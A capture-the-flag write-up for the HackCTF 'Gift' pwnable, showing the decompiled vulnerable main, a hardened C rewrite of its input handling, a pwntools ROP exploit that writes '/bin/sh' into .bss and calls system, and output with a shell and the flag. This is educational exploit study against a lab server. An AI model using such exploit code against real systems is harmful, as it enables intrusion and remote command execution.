[HackCTF / pwnable] Gift

2019. 10. 18. 07:21 | Wargame & CTF/HackCTF

HackCTF - Gift

Summary

  • 32-bit

Analysis

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
    char s; // [esp+0h] [ebp-84h]

    alarm(0x3Cu);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);
    printf("Hey guyssssssssss here you are: %p %p\n", &binsh, &system);
    fgets(&s, 128, stdin);
    printf(&s);
    gets(&s);
    return 0;
}

Input is read into s with gets, so s can be overflowed.

The program prints the address of binsh and the address of system. binsh lives in the .bss section and was empty, so we just need to write "/bin/sh" into binsh.
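As an added example that is not part of the original write-up, here is the input handling of Gift's main() rewritten in a hardened form: the unbounded gets() is replaced by a bounded reader that detects over-long lines instead of silently truncating them, and the echoed line goes through "%s" rather than being used as the printf format string. The names read_line, handle_input and stream_from are chosen here, and the sample inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128   /* same size as the stack buffer in Gift's main() */

/* Bounded replacement for gets(): reads one line into buf (at most size-1
 * bytes plus the NUL) and strips the newline. Returns 1 for a complete line,
 * 0 on EOF with no data, -1 if the line did not fit (the excess is drained
 * rather than silently truncated, so the next read starts on a fresh line). */
int read_line(char *buf, size_t size, FILE *in)
{
    if (fgets(buf, (int)size, in) == NULL)
        return 0;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    /* No newline in the buffer: either EOF ended the line or it was longer
     * than size-1 bytes. Count what has to be dropped up to the newline. */
    int c, dropped = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped++;
    return dropped ? -1 : 1;
}

/* Hardened version of Gift's input handling: both reads are bounded and the
 * first line is echoed as data via "%s", never passed as the format string.
 * Returns 0 on success, 1 if a line was rejected as over-long or missing. */
int handle_input(FILE *in, FILE *out)
{
    char s[BUF_SIZE];
    if (read_line(s, sizeof s, in) != 1)
        return 1;
    fprintf(out, "%s\n", s);                 /* was: printf(&s) */
    if (read_line(s, sizeof s, in) != 1)     /* was: gets(&s) */
        return 1;
    return 0;
}

/* Readable stream from constructed sample text, so the functions above can
 * be exercised offline with plain ISO C (tmpfile()). */
FILE *stream_from(const char *text)
{
    FILE *f = tmpfile();
    if (f != NULL && fputs(text, f) >= 0)
        rewind(f);
    return f;
}
```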

Exploit

from pwn import *

e = ELF("./gift")
#libc = e.libc
libc = ELF("./libc.so.6")
#p = process("./gift")
p = remote("ctf.j0n9hyun.xyz", 3018)

pr = 0x0804866b  # pop-ret gadget (pr), cleans the argument off the stack between calls

# parse the two addresses main() prints with "%p %p": binsh first, then system
p.recvuntil("0x")
binsh_addr = int("0x" + p.recvuntil(" ")[:-1], 0)
p.recvuntil("0x")
system_addr = int("0x" + p.recvuntil("\n")[:-1], 0)

# first read (fgets): any short line, just to get past it
payload = ""
payload += "A"
p.sendline(payload)

# second read (gets): fill s (0x84) and the saved ebp (4), then the chain
payload = ""
payload += "A"*(0x84+0x4)
payload += p32(0x080483D0)   # reads the next line into binsh, which is empty in .bss
payload += p32(pr)
payload += p32(binsh_addr)

payload += p32(system_addr)  # system(binsh), i.e. system("/bin/sh")
payload += p32(pr)
payload += p32(binsh_addr)

p.sendline(payload)
p.sendline("/bin/sh")        # consumed by the first call in the chain
p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/hackCTF/Gift$ p ex.py 
[*] '/home/cg10036/hackCTF/Gift/gift'
  Arch:     i386-32-little
  RELRO:   No RELRO
  Stack:   No canary found
  NX:       NX enabled
  PIE:     No PIE (0x8048000)
[*] '/home/cg10036/hackCTF/Gift/libc.so.6'
  Arch:     i386-32-little
  RELRO:   Partial RELRO
  Stack:   Canary found
  NX:       NX enabled
  PIE:     PIE enabled
[+] Opening connection to ctf.j0n9hyun.xyz on port 3018: Done
[*] Switching to interactive mode
A
$ cat flag
HackCTF{플래그_잘_받았지?_이게_내_선물이야!}

